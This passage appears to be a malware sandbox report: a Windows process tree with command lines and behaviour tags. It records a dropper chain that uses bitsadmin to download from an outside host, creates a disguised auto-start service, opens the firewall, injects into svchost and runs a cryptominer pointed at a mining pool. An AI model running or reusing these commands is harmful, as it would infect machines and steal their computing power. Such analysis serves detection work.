    cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe & exit
[depth 6] C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe
[depth 7] C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe"
    - Modifies data under HKEY_USERS
[depth 5] C:\Windows\System32\cmd.exe
    cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\an4qve0s.3vi\askinstall46.exe & exit
[depth 6] C:\Users\Admin\AppData\Local\Temp\an4qve0s.3vi\askinstall46.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\an4qve0s.3vi\askinstall46.exe
[depth 7] C:\Windows\SysWOW64\cmd.exe
    cmd: cmd.exe /c taskkill /f /im chrome.exe
[depth 8] C:\Windows\SysWOW64\taskkill.exe
    cmd: taskkill /f /im chrome.exe
    - Kills process with taskkill
[depth 5] C:\Windows\System32\cmd.exe
    cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22z30w1a.f44\note8876.exe & exit
[depth 6] C:\Users\Admin\AppData\Local\Temp\22z30w1a.f44\note8876.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\22z30w1a.f44\note8876.exe
    - Checks whether UAC is enabled
[depth 5] C:\Windows\System32\cmd.exe
    cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe & exit
[depth 6] C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe
[depth 7] C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe
    - Checks SCSI registry key(s)
[depth 5] C:\Windows\System32\cmd.exe
    cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ruzttkia.nte\SunLabsPlayer.exe /S & exit
[depth 6] C:\Users\Admin\AppData\Local\Temp\ruzttkia.nte\SunLabsPlayer.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\ruzttkia.nte\SunLabsPlayer.exe /S
    - Drops file in Program Files directory
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
    - Blocklisted process makes network request
    - Checks processor information in registry
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 8] C:\Windows\System32\Conhost.exe
    cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
    - Checks for any installed AV software in registry
[depth 7] C:\Windows\SysWOW64\bitsadmin.exe
    cmd: "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
    - Download via BitsAdmin
[depth 7] C:\Program Files (x86)\lighteningplayer\data_load.exe
    cmd: "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
    - Drops file in Program Files directory
[depth 7] C:\Program Files (x86)\lighteningplayer\data_load.exe
    cmd: "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 8] C:\Windows\System32\Conhost.exe
    cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Checks for any installed AV software in registry
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 7] C:\Windows\SysWOW64\rundll32.exe
    cmd: C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
[depth 8] C:\Windows\system32\rundll32.exe
    cmd: C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
    - Drops file in System32 directory
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
    - Drops file in Program Files directory
[depth 8] C:\Windows\System32\Conhost.exe
    cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Drops file in System32 directory
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
[depth 7] C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
    cmd: "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
[depth 8] C:\Windows\System32\Conhost.exe
    cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 5] C:\Windows\System32\cmd.exe
    cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ak51mapg.3ij\GcleanerWW.exe /mixone & exit
    - Blocklisted process makes network request
    - Modifies data under HKEY_USERS
[depth 1] C:\Users\Admin\AppData\Local\Temp\4AEF.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\4AEF.exe
[depth 2] C:\Users\Admin\AppData\Local\Temp\4AEF.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\4AEF.exe"
[depth 1] C:\Users\Admin\AppData\Local\Temp\4D22.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\4D22.exe
[depth 2] C:\Windows\SysWOW64\cmd.exe
    cmd: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ttwidmrg\
[depth 2] C:\Windows\SysWOW64\cmd.exe
    cmd: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\peiqysd.exe" C:\Windows\SysWOW64\ttwidmrg\
[depth 2] C:\Windows\SysWOW64\sc.exe
    cmd: "C:\Windows\System32\sc.exe" create ttwidmrg binPath= "C:\Windows\SysWOW64\ttwidmrg\peiqysd.exe /d\"C:\Users\Admin\AppData\Local\Temp\4D22.exe\"" type= own start= auto DisplayName= "wifi support"
[depth 2] C:\Windows\SysWOW64\sc.exe
    cmd: "C:\Windows\System32\sc.exe" description ttwidmrg "wifi internet conection"
[depth 2] C:\Windows\SysWOW64\sc.exe
    cmd: "C:\Windows\System32\sc.exe" start ttwidmrg
[depth 2] C:\Windows\SysWOW64\netsh.exe
    cmd: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
[depth 1] C:\Users\Admin\AppData\Local\Temp\54D4.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\54D4.exe
[depth 2] C:\Windows\SysWOW64\cmd.exe
    cmd: cmd.exe /c taskkill /f /im chrome.exe
[depth 3] C:\Windows\SysWOW64\taskkill.exe
    cmd: taskkill /f /im chrome.exe
    - Kills process with taskkill
[depth 1] C:\Windows\SysWOW64\ttwidmrg\peiqysd.exe
    cmd: C:\Windows\SysWOW64\ttwidmrg\peiqysd.exe /d"C:\Users\Admin\AppData\Local\Temp\4D22.exe"
[depth 2] C:\Windows\SysWOW64\svchost.exe
    cmd: svchost.exe
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
[depth 3] C:\Windows\SysWOW64\svchost.exe
    cmd: svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
[depth 1] C:\Windows\system32\browser_broker.exe
    cmd: C:\Windows\system32\browser_broker.exe -Embedding
    - Modifies Internet Explorer settings
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies Internet Explorer settings
    - Modifies registry class
[depth 2] C:\Windows\system32\WerFault.exe
    cmd: C:\Windows\system32\WerFault.exe -u -p 4952 -s 1668
    - Program crash
[depth 1] C:\Windows\system32\rUNdlL32.eXe
    cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    - Process spawned unexpected child process
[depth 2] C:\Windows\SysWOW64\rundll32.exe
    cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[depth 2] C:\Windows\system32\WerFault.exe
    cmd: C:\Windows\system32\WerFault.exe -u -p 5644 -s 2880
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
[depth 1] C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
[depth 1] C:\Windows\system32\rUNdlL32.eXe
    cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    - Process spawned unexpected child process
[depth 2] C:\Windows\SysWOW64\rundll32.exe
    cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
[depth 1] \??\c:\windows\system32\svchost.exe
    cmd: c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
[depth 1] C:\Windows\System32\Conhost.exe
    cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 1] C:\Windows\System32\Conhost.exe
    cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\system32\browser_broker.exe
    cmd: C:\Windows\system32\browser_broker.exe -Embedding
    - Modifies Internet Explorer settings
[depth 1] C:\Windows\system32\compattelrunner.exe
    cmd: C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[depth 1] C:\Windows\system32\rUNdlL32.eXe
    cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    - Process spawned unexpected child process
[depth 2] C:\Windows\SysWOW64\rundll32.exe
    cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
[depth 1] C:\Windows\system32\rUNdlL32.eXe
    cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    - Process spawned unexpected child process
[depth 2] C:\Windows\SysWOW64\rundll32.exe
    cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
[depth 1] C:\Windows\system32\rUNdlL32.eXe
    cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    - Process spawned unexpected child process
[depth 2] C:\Windows\SysWOW64\rundll32.exe
    cmd: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
[depth 3] C:\Windows\SysWOW64\WerFault.exe
    cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 9204 -s 616
    - Program crash
[depth 1] C:\Windows\system32\backgroundTaskHost.exe
    cmd: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
[depth 1] C:\Windows\system32\compattelrunner.exe
    cmd: C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
    - Suspicious use of SetThreadContext
[depth 1] C:\Windows\System32\Conhost.exe
    cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\system32\browser_broker.exe
    cmd: C:\Windows\system32\browser_broker.exe -Embedding
    - Modifies Internet Explorer settings
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[depth 1] \??\c:\windows\system32\svchost.exe
    cmd: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
[depth 1] C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\system32\browser_broker.exe
    cmd: C:\Windows\system32\browser_broker.exe -Embedding
    - Modifies Internet Explorer settings
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[depth 2] C:\Windows\system32\WerFault.exe
    cmd: C:\Windows\system32\WerFault.exe -u -p 4984 -s 1212
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
[depth 1] \??\c:\windows\system32\svchost.exe
    cmd: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\system32\browser_broker.exe
    cmd: C:\Windows\system32\browser_broker.exe -Embedding
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\system32\browser_broker.exe
    cmd: C:\Windows\system32\browser_broker.exe -Embedding
    - Modifies Internet Explorer settings
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[depth 2] C:\Windows\system32\WerFault.exe
    cmd: C:\Windows\system32\WerFault.exe -u -p 3928 -s 2012
    - Program crash
[depth 1] C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
[depth 1] \??\c:\windows\system32\svchost.exe
    cmd: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
